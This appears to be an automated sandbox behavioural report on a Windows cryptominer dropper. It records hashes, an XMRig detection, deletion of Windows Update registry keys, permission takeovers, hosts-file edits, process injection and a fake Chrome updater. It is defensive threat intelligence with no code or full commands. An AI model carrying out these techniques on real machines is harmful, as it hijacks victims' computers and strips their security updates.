Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2022 19:52
Static task
static1
Behavioral task
behavioral1
Sample
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Resource
win7-20220812-en
General
-
Target
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
-
Size
2.6MB
-
MD5
c0827a7bd617a2fcd31a3d751152c2e0
-
SHA1
2d58f48e54e1c54e7b63e7ba2c9f50323994242a
-
SHA256
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b
-
SHA512
cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5
-
SSDEEP
49152:Y00kMwfXeTG2JpMpukZ6obih7GQtMKc+l3s7RjE+SsZa:YJkduTG2JQdZ6nhYK1cu3
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 4188 created 3280 4188 WerFault.exe DllHost.exe PID 328 created 3388 328 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 3856 created 600 3856 powershell.EXE winlogon.exe PID 524 created 3388 524 svchost.exe DllHost.exe PID 524 created 3280 524 svchost.exe DllHost.exe PID 1708 created 600 1708 powershell.EXE winlogon.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4932-505-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/4900-516-0x000000014036EAC4-mapping.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exeupdater.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe File opened for modification C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 4672 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1236 takeown.exe 1064 icacls.exe 3672 takeown.exe 4920 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1236 takeown.exe 1064 icacls.exe 3672 takeown.exe 4920 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com -
Drops file in System32 directory 18 IoCs
Processes:
svchost.exepowershell.EXEpowershell.EXEsvchost.exeOfficeClickToRun.exeupdater.exepowershell.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log updater.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.EXEpowershell.EXEupdater.exedescription pid process target process PID 4948 set thread context of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 3856 set thread context of 2500 3856 powershell.EXE dllhost.exe PID 1708 set thread context of 2320 1708 powershell.EXE dllhost.exe PID 4672 set thread context of 4932 4672 updater.exe dialer.exe PID 4672 set thread context of 4900 4672 updater.exe dialer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.exeupdater.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4732 sc.exe 5024 sc.exe 3488 sc.exe 3692 sc.exe 3948 sc.exe 5032 sc.exe 3012 sc.exe 4872 sc.exe 3716 sc.exe 2356 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2076 3388 WerFault.exe DllHost.exe 4340 3280 WerFault.exe DllHost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
WerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEupdater.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1108 reg.exe 1772 reg.exe 1156 reg.exe 1516 reg.exe 328 reg.exe 4820 reg.exe 2836 reg.exe 4632 reg.exe 5056 reg.exe 1848 reg.exe 4160 reg.exe 4880 reg.exe 5004 reg.exe 2780 reg.exe 3400 reg.exe 2100 reg.exe 2156 reg.exe 2100 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exeWerFault.exesvchost.exepid process 2020 powershell.exe 2020 powershell.exe 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe 4192 powershell.exe 3856 powershell.EXE 3856 powershell.EXE 4192 powershell.exe 3856 powershell.EXE 2500 dllhost.exe 2500 dllhost.exe 1708 powershell.EXE 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2076 WerFault.exe 2076 WerFault.exe 4340 WerFault.exe 4340 WerFault.exe 2500 dllhost.exe 2500 dllhost.exe 1708 powershell.EXE 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 524 svchost.exe 524 svchost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 524 svchost.exe 524 svchost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2520 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe Token: SeShutdownPrivilege 4380 powercfg.exe Token: SeCreatePagefilePrivilege 4380 powercfg.exe Token: SeShutdownPrivilege 3728 powercfg.exe Token: SeCreatePagefilePrivilege 3728 powercfg.exe Token: SeShutdownPrivilege 2112 powercfg.exe Token: SeCreatePagefilePrivilege 2112 powercfg.exe Token: SeShutdownPrivilege 4492 powercfg.exe Token: SeCreatePagefilePrivilege 4492 powercfg.exe Token: SeTakeOwnershipPrivilege 1236 takeown.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 3856 powershell.EXE Token: SeDebugPrivilege 3856 powershell.EXE Token: SeIncreaseQuotaPrivilege 4192 powershell.exe Token: SeSecurityPrivilege 4192 powershell.exe Token: SeTakeOwnershipPrivilege 4192 powershell.exe Token: SeLoadDriverPrivilege 4192 powershell.exe Token: SeSystemProfilePrivilege 4192 powershell.exe Token: SeSystemtimePrivilege 4192 powershell.exe Token: SeProfSingleProcessPrivilege 4192 powershell.exe Token: SeIncBasePriorityPrivilege 4192 powershell.exe Token: SeCreatePagefilePrivilege 4192 powershell.exe Token: SeBackupPrivilege 4192 powershell.exe Token: SeRestorePrivilege 4192 powershell.exe Token: SeShutdownPrivilege 4192 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeSystemEnvironmentPrivilege 4192 powershell.exe Token: SeRemoteShutdownPrivilege 4192 powershell.exe Token: SeUndockPrivilege 4192 powershell.exe Token: SeManageVolumePrivilege 4192 powershell.exe Token: 33 4192 powershell.exe Token: 34 4192 powershell.exe Token: 35 4192 powershell.exe Token: 36 4192 powershell.exe Token: SeDebugPrivilege 2500 dllhost.exe Token: SeIncreaseQuotaPrivilege 4192 powershell.exe Token: SeSecurityPrivilege 4192 powershell.exe Token: SeTakeOwnershipPrivilege 4192 powershell.exe Token: SeLoadDriverPrivilege 4192 powershell.exe Token: SeSystemProfilePrivilege 4192 powershell.exe Token: SeSystemtimePrivilege 4192 powershell.exe Token: SeProfSingleProcessPrivilege 4192 powershell.exe Token: SeIncBasePriorityPrivilege 4192 powershell.exe Token: SeCreatePagefilePrivilege 4192 powershell.exe Token: SeBackupPrivilege 4192 powershell.exe Token: SeRestorePrivilege 4192 powershell.exe Token: SeShutdownPrivilege 4192 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeSystemEnvironmentPrivilege 4192 powershell.exe Token: SeRemoteShutdownPrivilege 4192 powershell.exe Token: SeUndockPrivilege 4192 powershell.exe Token: SeManageVolumePrivilege 4192 powershell.exe Token: 33 4192 powershell.exe Token: 34 4192 powershell.exe Token: 35 4192 powershell.exe Token: 36 4192 powershell.exe Token: SeIncreaseQuotaPrivilege 4192 powershell.exe Token: SeSecurityPrivilege 4192 powershell.exe Token: SeTakeOwnershipPrivilege 4192 powershell.exe Token: SeLoadDriverPrivilege 4192 powershell.exe Token: SeSystemProfilePrivilege 4192 powershell.exe Token: SeSystemtimePrivilege 4192 powershell.exe Token: SeProfSingleProcessPrivilege 4192 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 2632 Conhost.exe 4168 Conhost.exe 2832 Conhost.exe 4660 Conhost.exe 3924 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.execmd.execmd.exepowershell.EXEdescription pid process target process PID 4948 wrote to memory of 2020 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe powershell.exe PID 4948 wrote to memory of 2020 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe powershell.exe PID 4948 wrote to memory of 212 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe cmd.exe PID 4948 wrote to memory of 212 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe cmd.exe PID 4948 wrote to memory of 4072 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe cmd.exe PID 4948 wrote to memory of 4072 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe cmd.exe PID 212 wrote to memory of 3488 212 cmd.exe sc.exe PID 212 wrote to memory of 3488 212 cmd.exe sc.exe PID 212 wrote to memory of 3692 212 cmd.exe sc.exe PID 212 wrote to memory of 3692 212 cmd.exe sc.exe PID 212 wrote to memory of 4732 212 cmd.exe sc.exe PID 212 wrote to memory of 4732 212 cmd.exe sc.exe PID 4072 wrote to memory of 4380 4072 cmd.exe powercfg.exe PID 4072 wrote to memory of 4380 4072 cmd.exe powercfg.exe PID 212 wrote to memory of 3716 212 cmd.exe sc.exe PID 212 wrote to memory of 3716 212 cmd.exe sc.exe PID 212 wrote to memory of 5024 212 cmd.exe sc.exe PID 212 wrote to memory of 5024 212 cmd.exe sc.exe PID 4072 wrote to memory of 3728 4072 cmd.exe powercfg.exe PID 4072 wrote to memory of 3728 4072 cmd.exe powercfg.exe PID 212 wrote to memory of 2836 212 cmd.exe reg.exe PID 212 wrote to memory of 2836 212 cmd.exe reg.exe PID 4072 wrote to memory of 2112 4072 cmd.exe powercfg.exe PID 4072 wrote to memory of 2112 4072 cmd.exe powercfg.exe PID 212 wrote to memory of 2100 212 cmd.exe reg.exe PID 212 wrote to memory of 2100 212 cmd.exe reg.exe PID 4072 wrote to memory of 4492 4072 cmd.exe powercfg.exe PID 4072 wrote to memory of 4492 4072 cmd.exe powercfg.exe PID 212 wrote to memory of 328 212 cmd.exe reg.exe PID 212 wrote to memory of 328 212 cmd.exe reg.exe PID 212 wrote to memory of 4632 212 cmd.exe reg.exe PID 212 wrote to memory of 4632 212 cmd.exe reg.exe PID 212 wrote to memory of 5056 212 cmd.exe reg.exe PID 212 wrote to memory of 5056 212 cmd.exe reg.exe PID 212 wrote to memory of 1236 212 cmd.exe takeown.exe PID 212 wrote to memory of 1236 212 cmd.exe takeown.exe PID 212 wrote to memory of 1064 212 cmd.exe icacls.exe PID 212 wrote to memory of 1064 212 cmd.exe icacls.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 3060 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe conhost.exe PID 4948 wrote to memory of 4192 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe powershell.exe PID 4948 wrote to memory of 4192 4948 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe powershell.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 3856 wrote to memory of 2500 3856 powershell.EXE dllhost.exe PID 212 wrote to memory of 1848 212 cmd.exe reg.exe PID 212 wrote to memory of 1848 212 cmd.exe reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{70ee3c05-9b85-43e0-b203-6f15f48c5757}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{426c058d-46e0-41b6-8f7d-ffa63b0d6b95}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
